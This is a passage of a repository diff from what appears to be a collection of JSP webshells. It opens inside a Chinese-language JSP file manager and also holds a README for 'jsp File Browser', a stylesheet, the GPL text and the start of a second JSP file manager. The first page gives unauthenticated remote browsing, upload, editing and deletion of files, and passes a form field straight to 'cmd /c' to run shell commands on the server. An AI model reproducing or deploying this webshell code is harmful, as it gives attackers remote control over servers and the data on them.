UplInfo info = UploadMonitor.getInfo(fi.clientFileName);
if (info != null && info.aborted)
{
f1.delete();
request.setAttribute("error", "Upload aborted");
}
else
{
String path = (String) ht.get("path");
if(path!=null && !path.endsWith("\\"))
path = path + "\\";
if (!f1.renameTo(new File(path + f1.getName())))
{
request.setAttribute("error", "Cannot upload file.");
error = true;
f1.delete();
}
}
}
}
%>
<html>
<head>
<style type="text/css">
td,select,input,body{font-size:9pt;}
A { TEXT-DECORATION: none }
#tablist{
padding: 5px 0;
margin-left: 0;
margin-bottom: 0;
margin-top: 0.1em;
font:9pt;
}
#tablist li{
list-style: none;
display: inline;
margin: 0;
}
#tablist li a{
padding: 3px 0.5em;
margin-left: 3px;
border: 1px solid ;
background: F6F6F6;
}
#tablist li a:link, #tablist li a:visited{
color: navy;
}
#tablist li a.current{
background: #EAEAFF;
}
#tabcontentcontainer{
width: 100%;
padding: 5px;
border: 1px solid black;
}
.tabcontent{
display:none;
}
</style>
<script type="text/javascript">
var initialtab=[<%=tabID%>, "menu<%=tabID%>"]
////////Stop editting////////////////
function cascadedstyle(el, cssproperty, csspropertyNS){
if (el.currentStyle)
return el.currentStyle[cssproperty]
else if (window.getComputedStyle){
var elstyle=window.getComputedStyle(el, "")
return elstyle.getPropertyValue(csspropertyNS)
}
}
var previoustab=""
function expandcontent(cid, aobject){
if (document.getElementById){
highlighttab(aobject)
if (previoustab!="")
document.getElementById(previoustab).style.display="none"
document.getElementById(cid).style.display="block"
previoustab=cid
if (aobject.blur)
aobject.blur()
return false
}
else
return true
}
function highlighttab(aobject){
if (typeof tabobjlinks=="undefined")
collecttablinks()
for (i=0; i<tabobjlinks.length; i++)
tabobjlinks[i].style.backgroundColor=initTabcolor
var themecolor=aobject.getAttribute("theme")? aobject.getAttribute("theme") : initTabpostcolor
aobject.style.backgroundColor=document.getElementById("tabcontentcontainer").style.backgroundColor=themecolor
}
function collecttablinks(){
var tabobj=document.getElementById("tablist")
tabobjlinks=tabobj.getElementsByTagName("A")
}
function do_onload(){
collecttablinks()
initTabcolor=cascadedstyle(tabobjlinks[1], "backgroundColor", "background-color")
initTabpostcolor=cascadedstyle(tabobjlinks[0], "backgroundColor", "background-color")
expandcontent(initialtab[1], tabobjlinks[initialtab[0]-1])
}
if (window.addEventListener)
window.addEventListener("load", do_onload, false)
else if (window.attachEvent)
window.attachEvent("onload", do_onload)
else if (document.getElementById)
window.onload=do_onload
</script>
<script language="javascript">
function doForm(action,path,file,cmd,tab,content)
{
document.frmCqq.action.value=action;
document.frmCqq.path.value=path;
document.frmCqq.file.value=file;
document.frmCqq.cmd.value=cmd;
document.frmCqq.tabID.value=tab;
document.frmCqq.content.value=content;
if(action=="del")
{
if(confirm("确定要删除文件 "+file+" 吗?"))
document.frmCqq.submit();
}
else
{
document.frmCqq.submit();
}
}
</script>
<title>index</title>
<head>
<body>
<form name="frmCqq" method="post" action="">
<input type="hidden" name="action" value="">
<input type="hidden" name="path" value="">
<input type="hidden" name="file" value="">
<input type="hidden" name="cmd" value="">
<input type="hidden" name="tabID" value="2">
<input type="hidden" name="content" value="">
</form>
<!--Top Menu Started-->
<ul id="tablist">
<li><a href="http://www.smallrain.net" class="current" onClick="return expandcontent('menu1', this)"> <%=strFileManage[languageNo]%> </a></li>
<li><a href="new.htm" onClick="return expandcontent('menu2', this)" theme="#EAEAFF"> <%=strCommand[languageNo]%> </a></li>
<li><a href="hot.htm" onClick="return expandcontent('menu3', this)" theme="#EAEAFF"> <%=strSysProperty[languageNo]%> </a></li>
<li><a href="search.htm" onClick="return expandcontent('menu4', this)" theme="#EAEAFF"> <%=strHelp[languageNo]%> </a></li>
&nbsp; <%=authorInfo[languageNo]%>
</ul>
<!--Top Menu End-->
<%
StringBuffer sbFolder=new StringBuffer("");
StringBuffer sbFile=new StringBuffer("");
try
{
File objFile = new File(strDir);
File list[] = objFile.listFiles();
if(objFile.getAbsolutePath().length()>3)
{
sbFolder.append("<tr><td >&nbsp;</td><td><a href=\"javascript:doForm('','"+formatPath(objFile.getParentFile().getAbsolutePath())+"','','"+strCmd+"','1','');\">");
sbFolder.append(strParentFolder[languageNo]+"</a><br>- - - - - - - - - - - </td></tr>\r\n ");
}
for(int i=0;i<list.length;i++)
{
if(list[i].isDirectory())
{
sbFolder.append("<tr><td >&nbsp;</td><td>");
sbFolder.append(" <a href=\"javascript:doForm('','"+formatPath(list[i].getAbsolutePath())+"','','"+strCmd+"','1','');\">");
sbFolder.append(list[i].getName()+"</a><br></td></tr> ");
}
else
{
String strLen="";
String strDT="";
long lFile=0;
lFile=list[i].length();
strLen = convertFileSize(lFile);
Date dt=new Date(list[i].lastModified());
strDT=dt.toLocaleString();
sbFile.append("<tr onmouseover=\"this.style.backgroundColor='#FBFFC6'\" onmouseout=\"this.style.backgroundColor='white'\"><td>");
sbFile.append(""+list[i].getName());
sbFile.append("</td><td>");
sbFile.append(""+strLen);
sbFile.append("</td><td>");
sbFile.append(""+strDT);
sbFile.append("</td><td>");
sbFile.append(" &nbsp;<a href=\"javascript:doForm('edit','"+formatPath(strDir)+"','"+list[i].getName()+"','"+strCmd+"','"+tabID+"','');\">");
sbFile.append(strFileEdit[languageNo]+"</a> ");
sbFile.append(" &nbsp;<a href=\"javascript:doForm('del','"+formatPath(strDir)+"','"+list[i].getName()+"','"+strCmd+"','"+tabID+"','');\">");
sbFile.append(strFileDel[languageNo]+"</a> ");
sbFile.append(" &nbsp;<a href=\"javascript:doForm('down','"+formatPath(strDir)+"','"+list[i].getName()+"','"+strCmd+"','"+tabID+"','');\">");
sbFile.append(strFileDown[languageNo]+"</a> ");
sbFile.append(" &nbsp;<a href=\"javascript:doForm('copy','"+formatPath(strDir)+"','"+list[i].getName()+"','"+strCmd+"','"+tabID+"','');\">");
sbFile.append(strFileCopy[languageNo]+"</a> ");
}
}
}
catch(Exception e)
{
out.println("<font color=red>操作失败: "+e.toString()+"</font>");
}
%>
<DIV id="tabcontentcontainer">
<div id="menu3" class="tabcontent">
<br>
<br> &nbsp;&nbsp; 未完成
<br>
<br>&nbsp;
</div>
<div id="menu4" class="tabcontent">
<br>
<p></p>
<p>&nbsp;</p>
<p>&nbsp;</p>
</div>
<div id="menu1" class="tabcontent">
<%
out.println("<table border='1' width='100%' bgcolor='#FBFFC6' cellspacing=0 cellpadding=5 bordercolorlight=#000000 bordercolordark=#FFFFFF><tr><td width='30%'>"+strCurrentFolder[languageNo]+" <b>"+strDir+"</b></td><td>" + getDrivers() + "</td></tr></table><br>\r\n");
%>
<table width="100%" border="1" cellspacing="0" cellpadding="5" bordercolorlight="#000000" bordercolordark="#FFFFFF">
<tr>
<td width="25%" align="center" valign="top">
<table width="98%" border="0" cellspacing="0" cellpadding="3">
<%=sbFolder%>
</tr>
</table>
</td>
<td width="81%" align="left" valign="top">
<%
if(strAction!=null && strAction.equals("edit"))
{
out.println(sbEdit.toString());
}
else if(strAction!=null && strAction.equals("copy"))
{
out.println(sbCopy.toString());
}
else if(strAction!=null && strAction.equals("down"))
{
out.println(sbDown.toString());
}
else if(strAction!=null && strAction.equals("savecopy"))
{
out.println(sbSaveCopy.toString());
}
else if(strAction!=null && strAction.equals("newFile") && !sbNewFile.toString().equals(""))
{
out.println(sbNewFile.toString());
}
else
{
%>
<span id="EditBox"><table width="98%" border="1" cellspacing="1" cellpadding="4" bordercolorlight="#cccccc" bordercolordark="#FFFFFF" bgcolor="white" >
<tr bgcolor="#E7e7e6">
<td width="26%"><%=strFileName[languageNo]%></td>
<td width="19%"><%=strFileSize[languageNo]%></td>
<td width="29%"><%=strLastModified[languageNo]%></td>
<td width="26%"><%=strFileOperation[languageNo]%></td>
</tr>
<%=sbFile%>
<!-- <tr align="center">
<td colspan="4"><br>
总计文件个数:<font color="#FF0000">30</font> ,大小:<font color="#FF0000">664.9</font>
KB </td>
</tr>
-->
</table>
</span>
<%
}
%>
</td>
</tr>
<form name="frmMake" action="" method="post">
<tr><td colspan=2 bgcolor=#FBFFC6>
<input type="hidden" name="action" value="newFile">
<input type="hidden" name="path" value="<%=strDir%>">
<input type="hidden" name="file" value="<%=strFile%>">
<input type="hidden" name="cmd" value="<%=strCmd%>">
<input type="hidden" name="tabID" value="1">
<input type="hidden" name="content" value="">
<%
if(!strDir.endsWith("\\"))
strDir = strDir + "\\";
%>
<input type="text" name="fileName" size=36 value="<%=strDir%>">
<input type="submit" name="btnNewFile" value="新建文件" onclick="frmMake.submit()" >
<input type="submit" name="btnNewDir" value="新建目录" onclick="frmMake.submit()" >
</form>
<form name="frmUpload" enctype="multipart/form-data" action="" method="post">
<input type="hidden" name="action" value="upload">
<input type="hidden" name="path" value="<%=strDir%>">
<input type="hidden" name="file" value="<%=strFile%>">
<input type="hidden" name="cmd" value="<%=strCmd%>">
<input type="hidden" name="tabID" value="1">
<input type="hidden" name="content" value="">
<input type="file" name="cqqUploadFile" size="36">
<input type="submit" name="submit" value="上传">
</td></tr></form>
</table>
</div>
<div id="menu2" class="tabcontent">
<%
String line="";
StringBuffer sbCmd=new StringBuffer("");
if(strCmd!=null)
{
try
{
//out.println(strCmd);
Process p=Runtime.getRuntime().exec("cmd /c "+strCmd);
BufferedReader br=new BufferedReader(new InputStreamReader(p.getInputStream()));
while((line=br.readLine())!=null)
{
sbCmd.append(line+"\r\n");
}
}
catch(Exception e)
{
System.out.println(e.toString());
}
}
else
{
strCmd = "set";
}
%>
<form name="cmd" action="" method="post">
&nbsp;
<input type="text" name="cmd" value="<%=strCmd%>" size=50>
<input type="hidden" name="tabID" value="2">
<input type=submit name=submit value="<%=strExecute[languageNo]%>">
</form>
<%
if(sbCmd!=null && sbCmd.toString().trim().equals("")==false)
{
%>
&nbsp;<TEXTAREA NAME="cqq" ROWS="20" COLS="100%"><%=sbCmd.toString()%></TEXTAREA>
<br>&nbsp;
<%
}
%>
</DIV>
</div>
<br><br>
<center>

1811
jsp/hackk8/fuck-jsp/job.jsp Normal file

File diff suppressed because it is too large Load diff

File diff suppressed because it is too large Load diff

File diff suppressed because it is too large Load diff

File diff suppressed because it is too large Load diff


@ -0,0 +1,279 @@
jsp File Browser version 1.2
--------------------------------------------------------------------------------------
------------------------IMPORTANT
With this jsp you can destroy important files on your system, it also could be
a serious security hole on your server.
Use this script only, if you know what you do. There is no warranty of any kind.
------------------------REQUIREMENTS
To use the File browser, you need a JSP1.1 compatible Web Server like Tomcat, Resin
or Jetty.
If you use the browser on webspace provided by an internet service provider,
it could be, that you are not allowed to go in some directories or execute
commands on the server, this will result in an exception.
------------------------INSTALLATION
Just copy the jsp file to any configured Web application. The author recommends to
protect the directory you copy the file into by password, to avoid abuse.
------------------------SETTINGS
If you want to change the standard style, you can create a css file in the directory
where Browser.jsp is located with the name "Browser.css". If you want choose another name
change this line in Browser.jsp:
private static final String CSS_NAME = "Browser.css";
For the syntax, look at the example css file.
If you click on a filename, the file will be opened in an new window. If you want that file
opened in your current window, change this line:
private static final boolean USE_POPUP = true;
to
private static final boolean USE_POPUP = false;
If you hold the mouse cursor over a directory name, a tooltip with
the first ten entries of this directory show up. This feature can lead to performance issues. If
you observe slow loading times you should change this line:
private static final boolean USE_DIR_PREVIEW = true;
to
private static final boolean USE_DIR_PREVIEW = false;
You could also change the number of entries in the preview by changing this line:
private static final int DIR_PREVIEW_NUMBER = 10;
If you would like to execute commands on the server, you have to specify a
command line interpreter and the parameter to execute a command.
This is the parameter for windows:
private static final String[] COMMAND_INTERPRETER = {"cmd","/C"};
The maximum time in ms a command is allowed to run before it will be terminated is specified
by this line:
private static final long MAX_PROCESS_RUNNING_TIME = 30000;
You can restrict file browsing and manipulation by setting
private static final boolean RESTRICT_BROWSING = true;
You can choose between whitelist restriction, that means the user is allowed to browse only in
directories, which are lower than RESTRICT_PATH, or blacklist restriction, which allows
the user to access all directories besides RESTRICT_PATH.
private static final boolean RESTRICT_WHITELIST = true;
You can set more than one directory in RESTRICT_PATH, seperated by semicolon.
It is also possible to make the file browser read-only. All operations which change the
file structure (besides upload and native command execution) are forbidden and turned off.
To achieve this change
private static final boolean READ_ONLY = false;
to
private static final boolean READ_ONLY = true;
.
You can also turn off upload with
private static final boolean ALLOW_UPLOAD = false; .
If you restrict file access it is also recommend to forbid native command execution by
changing
private static final boolean NATIVE_COMMANDS = true;
to
private static final boolean NATIVE_COMMANDS = false;
.
------------------------USAGE
This JSP program allows remote web-based file access and manipulation.
You can copy, create, move, rename and delete files.
Text files can be edited and groups of files and folders can be downloaded
as a single zip file that is created on the fly.
http://server/webapp/Browser.jsp
or
http://server/webapp/Browser.jsp?dir=[Directory on the server]
You do not need a javascript capable browser, but it looks nicer with it.
If you want to copy or move a file, please enter the target directory name in the
edit field (absolute or relative). If you want to create a new file or directory,
enter the name in the edit field.
If you click on a header name (e.g. size) the entries will be sorted by this property.
If you click two times, they will be sorted descending.
The button "Download as zip" let you download the selected directories and files packed as
one zip file.
The buttons "Delete Files", "Move Files", "Copy Files", delete, move and copy also selected
directories with subdirectories.
If you click on a .zip or .jar filename, you will see the entries of the packed file.
You can unpack .zip, .jar and .gz direct on the server. For this filetype the entry in the
last column is "Unpack". If you click at the "Unpack" link, the file will be unpacked in
the current folder. Note, that you can only unpack a file, if no entry of the packed file
already exist in the directory (no overwriting). If you want to unpack this file, you have
to delete the files on the server which correspond to the entries. This feature is very useful,
if you would like to upload more than one file. Zip the files together on your computer,
then upload the zip file and extract it on the server.
You can execute commands on the server (if you are allowed to) by clicking the "Launch command"
button, but beware that you cannot interact with the program. If the execution time of the program
is longer than MAX_PROCESS_RUNNING_TIME (standard: 30 sec.) the program will be killed.
If you click on a file, it will be shown, if the MIME Type is supported.
The following MIME Types are supported:
.png image/png
.jpg, .jpeg image/jpeg
.gif image/gif
.tiff image/tiff
.svg image/svg+xml
.pdf application/pdf
.htm, .html, .shtml text/html
.xml text/xml
.avi video/x-msvideo
.mov video/quicktime
.mpg, .mpeg, .mpe video/mpeg
.rtf application/rtf
.mid, .midi, audio/x-midi
.xl,.xls,.xlv,.xla,.xlb,.xlt,.xlm,.xlk application/excel
.doc, .dot application/msword
.mp3 audio/mp3
.ogg audio/ogg
else text/plain
------------------------SHORTKEYS
You can use the following shortkeys for better handling:
r Rename file
m Move file
y Copy file
Del Delete file
l Launch command
z Download selected files as zip
c Create file
d Create directory
------------------------KNOWN BUGS
The JVM from windows will sometimes displays a message box on the server,
if you try to access an empty removable drive. There will be no respond from
the server until the message box is closed.
If someone knows how to fix this, please write me a mail.
Removable drives will not be shown on the list, if you add them to this
property:
private static final String[] FORBIDDEN_DRIVES= {"a:\\"}
like e.g.
private static final String[] FORBIDDEN_DRIVES= {"a:\\", "d:\\", "e:\\"}
------------------------CONTACT
Boris von Loesch
boris@vonloesch.de
------------------------CHANGELOG
1.2 (21.07.2006)
- Shortkeys
- Filter file table
- Fix a bug which appears with Tomcat
- Add parameter to turn jsp filebrowser to a read-only version
- Add parameter to disallow uploads (even in the read-only version)
- Nicer layout
- Javascript will now be cached by the browser therefore smaller page size
- Turned off directory preview by default, because it uses too much resources
1.1a (27.08.2004)
- killed a bug, which appears if you view or download files
- fix upload time display
1.1 (20.08.2004)
- Upload monitor
- Restrict file access
1.0 (13.04.2004)
- if you click two times on a table header, it will be sorted descending
- sort parameter is memorized
- bugfixes (14,11,15)
- added some mime types
1.0RC2 (02.02.2004)
- only bugfixes (3,4,6,9)
1.0RC1 (17.11.2003)
Thanks to David Cowan for code contribution (buffering), bug fixing and testing
- execute native shell commands
- quick change to lower directories paths
- solve homepath problem with Oracle oc4j
- remove two bugs in the upload routine
- add war file unpack and view support
- remove some html errors (page is now valid HTML 4.1 Transitional)
- add buffering for download of files and zip file creation, this increases the speed
0.6 (14.10.2003)
Thanks to David Levine for bug fixes
- Refactor parts of the code
- Viewing and unpacking of .zip, .jar and .gz files on the server
- Customizable layout via external css file (optional)
- Distinction between error and success messages
- Open File in a new window
- "Select all" checkbox
- More options
- Some small changes and bugfixes
0.5 (20.08.2003)
Greetings to Taylor Bastien who contributed a lot of code for this release
- Renaming of files
- File extension in an extra column
- variable filesize unit (bytes, KB or MB)
- Directory preview via tooltip (simple hold the mousecursor over a directory name and
a tooltip with the first ten entries will appear)
- Summary (number and size of all files in the current directory)
- Text editor can save files with dos/windows or unix line ending
- many small changes
0.4 (17.05.2003)
- It does not longer need a temporary directory !
- Jsp 1.1 compatible (works now also in Tomcat 3)
- The file editor can now save the edited file with a new name and can make a backup
- selected row is marked by color and the checkbox can be selected by click at any place in the row
(works only with Javascript)
- some new MIME types (xml, png, svg)
- unreadable files and directories are marked (not selectable)
- write protected files and directories are marked (italic)
- if no dir parameter is assigned, the home directory of the browser will be displayed
- some bugs killed
0.3
- Output is HTML 4.01 conform, should now be netscape>4 compatible
- Messages to indicate the status of an operation
- Many bugs killed
- Tooltips
0.2
- First release
CREDITS
Taylor Bastien
David Levine
David Cowan
Lieven Govaerts
LICENSE
jsp File browser
Copyright (C) 2003-2006 Boris von Loesch
This program is free software; you can redistribute it and/or modify it under
the terms of the GNU General Public License as published by the
Free Software Foundation; either version 2 of the License, or (at your option)
any later version.
This program is distributed in the hope that it will be useful, but
WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
You should have received a copy of the GNU General Public License along with
this program; if not, write to the
Free Software Foundation, Inc.,
59 Temple Place, Suite 330,
Boston, MA 02111-1307 USA


@ -0,0 +1,50 @@
input.button { background-color: #EF9C00;
color: #8C5900;
border: 2px outset #EF9C00; }
input.button:Hover { color: #444444 }
input { background-color:#FDEBCF;
border: 2px inset #FDEBCF }
table.filelist { background-color:#FDE2B8;
width:100%;
border:3px solid #ffffff }
th { background-color:#BC001D;
font-size: 10pt;
color:#022F55 }
tr.mouseout { background-color:#F5BA5C; }
tr.mouseout td {border:1px solid #F5BA5C;}
tr.mousein { background-color:#EF9C00; }
tr.mousein td { border-top:1px solid #3399ff;
border-bottom:1px solid #3399FF;
border-left:1px solid #EF9C00;
border-right:1px solid #EF9C00; }
tr.checked { background-color:#B57600 }
tr.checked td {border:1px solid #B57600;}
tr.mousechecked { background-color:#8C5900 }
tr.mousechecked td {border:1px solid #8C5900;}
td { font-family:Verdana, Arial, Helvetica, sans-serif;
font-size: 7pt;
color: #FFF5E8; }
td.message { background-color: #FFFF00;
color: #000000;
text-align:center;
font-weight:bold }
.formular {margin: 1px; background-color:#ffffff; padding: 1em; border:1px solid #000000;}
.formular2 {margin: 1px;}
A { text-decoration: none;
color: #005073
}
A:Hover { color : #022F55;
text-decoration : underline; }
BODY { font-family:Verdana, Arial, Helvetica, sans-serif;
font-size: 8pt;
color: #666666;
background-color: #FDE2B8;
}


@ -0,0 +1,222 @@
GNU GENERAL PUBLIC LICENSE
TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION
0. This License applies to any program or other work which contains
a notice placed by the copyright holder saying it may be distributed
under the terms of this General Public License. The "Program", below,
refers to any such program or work, and a "work based on the Program"
means either the Program or any derivative work under copyright law:
that is to say, a work containing the Program or a portion of it,
either verbatim or with modifications and/or translated into another
language. (Hereinafter, translation is included without limitation in
the term "modification".) Each licensee is addressed as "you".
Activities other than copying, distribution and modification are not
covered by this License; they are outside its scope. The act of
running the Program is not restricted, and the output from the Program
is covered only if its contents constitute a work based on the
Program (independent of having been made by running the Program).
Whether that is true depends on what the Program does.
1. You may copy and distribute verbatim copies of the Program's
source code as you receive it, in any medium, provided that you
conspicuously and appropriately publish on each copy an appropriate
copyright notice and disclaimer of warranty; keep intact all the
notices that refer to this License and to the absence of any warranty;
and give any other recipients of the Program a copy of this License
along with the Program.
You may charge a fee for the physical act of transferring a copy, and
you may at your option offer warranty protection in exchange for a fee.
2. You may modify your copy or copies of the Program or any portion
of it, thus forming a work based on the Program, and copy and
distribute such modifications or work under the terms of Section 1
above, provided that you also meet all of these conditions:
a) You must cause the modified files to carry prominent notices
stating that you changed the files and the date of any change.
b) You must cause any work that you distribute or publish, that in
whole or in part contains or is derived from the Program or any
part thereof, to be licensed as a whole at no charge to all third
parties under the terms of this License.
c) If the modified program normally reads commands interactively
when run, you must cause it, when started running for such
interactive use in the most ordinary way, to print or display an
announcement including an appropriate copyright notice and a
notice that there is no warranty (or else, saying that you provide
a warranty) and that users may redistribute the program under
these conditions, and telling the user how to view a copy of this
License. (Exception: if the Program itself is interactive but
does not normally print such an announcement, your work based on
the Program is not required to print an announcement.)
These requirements apply to the modified work as a whole. If
identifiable sections of that work are not derived from the Program,
and can be reasonably considered independent and separate works in
themselves, then this License, and its terms, do not apply to those
sections when you distribute them as separate works. But when you
distribute the same sections as part of a whole which is a work based
on the Program, the distribution of the whole must be on the terms of
this License, whose permissions for other licensees extend to the
entire whole, and thus to each and every part regardless of who wrote it.
Thus, it is not the intent of this section to claim rights or contest
your rights to work written entirely by you; rather, the intent is to
exercise the right to control the distribution of derivative or
collective works based on the Program.
In addition, mere aggregation of another work not based on the Program
with the Program (or with a work based on the Program) on a volume of
a storage or distribution medium does not bring the other work under
the scope of this License.
3. You may copy and distribute the Program (or a work based on it,
under Section 2) in object code or executable form under the terms of
Sections 1 and 2 above provided that you also do one of the following:
a) Accompany it with the complete corresponding machine-readable
source code, which must be distributed under the terms of Sections
1 and 2 above on a medium customarily used for software interchange; or,
b) Accompany it with a written offer, valid for at least three
years, to give any third party, for a charge no more than your
cost of physically performing source distribution, a complete
machine-readable copy of the corresponding source code, to be
distributed under the terms of Sections 1 and 2 above on a medium
customarily used for software interchange; or,
c) Accompany it with the information you received as to the offer
to distribute corresponding source code. (This alternative is
allowed only for noncommercial distribution and only if you
received the program in object code or executable form with such
an offer, in accord with Subsection b above.)
The source code for a work means the preferred form of the work for
making modifications to it. For an executable work, complete source
code means all the source code for all modules it contains, plus any
associated interface definition files, plus the scripts used to
control compilation and installation of the executable. However, as a
special exception, the source code distributed need not include
anything that is normally distributed (in either source or binary
form) with the major components (compiler, kernel, and so on) of the
operating system on which the executable runs, unless that component
itself accompanies the executable.
If distribution of executable or object code is made by offering
access to copy from a designated place, then offering equivalent
access to copy the source code from the same place counts as
distribution of the source code, even though third parties are not
compelled to copy the source along with the object code.
4. You may not copy, modify, sublicense, or distribute the Program
except as expressly provided under this License. Any attempt
otherwise to copy, modify, sublicense or distribute the Program is
void, and will automatically terminate your rights under this License.
However, parties who have received copies, or rights, from you under
this License will not have their licenses terminated so long as such
parties remain in full compliance.
5. You are not required to accept this License, since you have not
signed it. However, nothing else grants you permission to modify or
distribute the Program or its derivative works. These actions are
prohibited by law if you do not accept this License. Therefore, by
modifying or distributing the Program (or any work based on the
Program), you indicate your acceptance of this License to do so, and
all its terms and conditions for copying, distributing or modifying
the Program or works based on it.
6. Each time you redistribute the Program (or any work based on the
Program), the recipient automatically receives a license from the
original licensor to copy, distribute or modify the Program subject to
these terms and conditions. You may not impose any further
restrictions on the recipients' exercise of the rights granted herein.
You are not responsible for enforcing compliance by third parties to
this License.
7. If, as a consequence of a court judgment or allegation of patent
infringement or for any other reason (not limited to patent issues),
conditions are imposed on you (whether by court order, agreement or
otherwise) that contradict the conditions of this License, they do not
excuse you from the conditions of this License. If you cannot
distribute so as to satisfy simultaneously your obligations under this
License and any other pertinent obligations, then as a consequence you
may not distribute the Program at all. For example, if a patent
license would not permit royalty-free redistribution of the Program by
all those who receive copies directly or indirectly through you, then
the only way you could satisfy both it and this License would be to
refrain entirely from distribution of the Program.
If any portion of this section is held invalid or unenforceable under
any particular circumstance, the balance of the section is intended to
apply and the section as a whole is intended to apply in other
circumstances.
It is not the purpose of this section to induce you to infringe any
patents or other property right claims or to contest validity of any
such claims; this section has the sole purpose of protecting the
integrity of the free software distribution system, which is
implemented by public license practices. Many people have made
generous contributions to the wide range of software distributed
through that system in reliance on consistent application of that
system; it is up to the author/donor to decide if he or she is willing
to distribute software through any other system and a licensee cannot
impose that choice.
This section is intended to make thoroughly clear what is believed to
be a consequence of the rest of this License.
8. If the distribution and/or use of the Program is restricted in
certain countries either by patents or by copyrighted interfaces, the
original copyright holder who places the Program under this License
may add an explicit geographical distribution limitation excluding
those countries, so that distribution is permitted only in or among
countries not thus excluded. In such case, this License incorporates
the limitation as if written in the body of this License.
9. The Free Software Foundation may publish revised and/or new versions
of the General Public License from time to time. Such new versions will
be similar in spirit to the present version, but may differ in detail to
address new problems or concerns.
Each version is given a distinguishing version number. If the Program
specifies a version number of this License which applies to it and "any
later version", you have the option of following the terms and conditions
either of that version or of any later version published by the Free
Software Foundation. If the Program does not specify a version number of
this License, you may choose any version ever published by the Free Software
Foundation.
10. If you wish to incorporate parts of the Program into other free
programs whose distribution conditions are different, write to the author
to ask for permission. For software which is copyrighted by the Free
Software Foundation, write to the Free Software Foundation; we sometimes
make exceptions for this. Our decision will be guided by the two goals
of preserving the free status of all derivatives of our free software and
of promoting the sharing and reuse of software generally.
NO WARRANTY
11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY
FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN
OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES
PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED
OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS
TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE
PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING,
REPAIR OR CORRECTION.
12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING
WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR
REDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES,
INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING
OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED
TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY
YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER
PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE
POSSIBILITY OF SUCH DAMAGES.
END OF TERMS AND CONDITIONS

1811
jsp/hackk8/fuck-jsp/ma1.jsp Normal file

File diff suppressed because it is too large Load diff

807
jsp/hackk8/fuck-jsp/ma2.jsp Normal file

@ -0,0 +1,807 @@
<%@ page import="java.util.*,java.net.*,java.text.*,java.util.zip.*,java.io.*"%>
<%@ page contentType="text/html;charset=gb2312"%>
<%!
/*
**************************************************************************************
*JSP 文件管理器 v1.001 *
*Copyright (C) 2003 by Bagheera *
*E-mail:bagheera@beareyes.com *
*QQ:179189585 *
*http://jmmm.com *
*------------------------------------------------------------------------------------*
*警告:请不要随便修改以上版权信息! *
**************************************************************************************
*#######免费空间管理系统正在完善之中,请到这里测试并发表宝贵意见: *
**http://jmmm.com/web/index.jsp 测试帐号:test 密码:test *
**************************************************************************************
*/
//编辑器显示列数
private static final int EDITFIELD_COLS =100;
//编辑器显示行数
private static final int EDITFIELD_ROWS = 30;
//-----------------------------------------------------------------------------
//改变上传文件是的缓冲目录(一般不需要修改)
private static String tempdir = ".";
public class FileInfo{
public String name = null,
clientFileName = null,
fileContentType = null;
private byte[] fileContents = null;
public File file = null;
public StringBuffer sb = new StringBuffer(100);
public void setFileContents(byte[] aByteArray){
fileContents = new byte[aByteArray.length];
System.arraycopy(aByteArray, 0, fileContents, 0, aByteArray.length);
}
}
public class HttpMultiPartParser{
private final String lineSeparator = System.getProperty("line.separator", "\n");
private final int ONE_MB=1024*1024*1;
public Hashtable processData(ServletInputStream is, String boundary, String saveInDir)
throws IllegalArgumentException, IOException {
if (is == null) throw new IllegalArgumentException("InputStream");
if (boundary == null || boundary.trim().length() < 1)
throw new IllegalArgumentException("boundary");
boundary = "--" + boundary;
StringTokenizer stLine = null, stFields = null;
FileInfo fileInfo = null;
Hashtable dataTable = new Hashtable(5);
String line = null, field = null, paramName = null;
boolean saveFiles=(saveInDir != null && saveInDir.trim().length() > 0),
isFile = false;
if (saveFiles){
File f = new File(saveInDir);
f.mkdirs();
}
line = getLine(is);
if (line == null || !line.startsWith(boundary))
throw new IOException("未发现;"
+" boundary = " + boundary
+", line = " + line);
while (line != null){
if (line == null || !line.startsWith(boundary)) return dataTable;
line = getLine(is);
if (line == null) return dataTable;
stLine = new StringTokenizer(line, ";\r\n");
if (stLine.countTokens() < 2) throw new IllegalArgumentException("出现错误!");
line = stLine.nextToken().toLowerCase();
if (line.indexOf("form-data") < 0) throw new IllegalArgumentException("出现错误!");
stFields = new StringTokenizer(stLine.nextToken(), "=\"");
if (stFields.countTokens() < 2) throw new IllegalArgumentException("出现错误!");
fileInfo = new FileInfo();
stFields.nextToken();
paramName = stFields.nextToken();
isFile = false;
if (stLine.hasMoreTokens()){
field = stLine.nextToken();
stFields = new StringTokenizer(field, "=\"");
if (stFields.countTokens() > 1){
if (stFields.nextToken().trim().equalsIgnoreCase("filename")){
fileInfo.name=paramName;
String value = stFields.nextToken();
if (value != null && value.trim().length() > 0){
fileInfo.clientFileName=value;
isFile = true;
}
else{
line = getLine(is); // 去掉"Content-Type:"行
line = getLine(is); // 去掉空白行
line = getLine(is); // 去掉空白行
line = getLine(is); // 定位
continue;
}
}
}
else if (field.toLowerCase().indexOf("filename") >= 0){
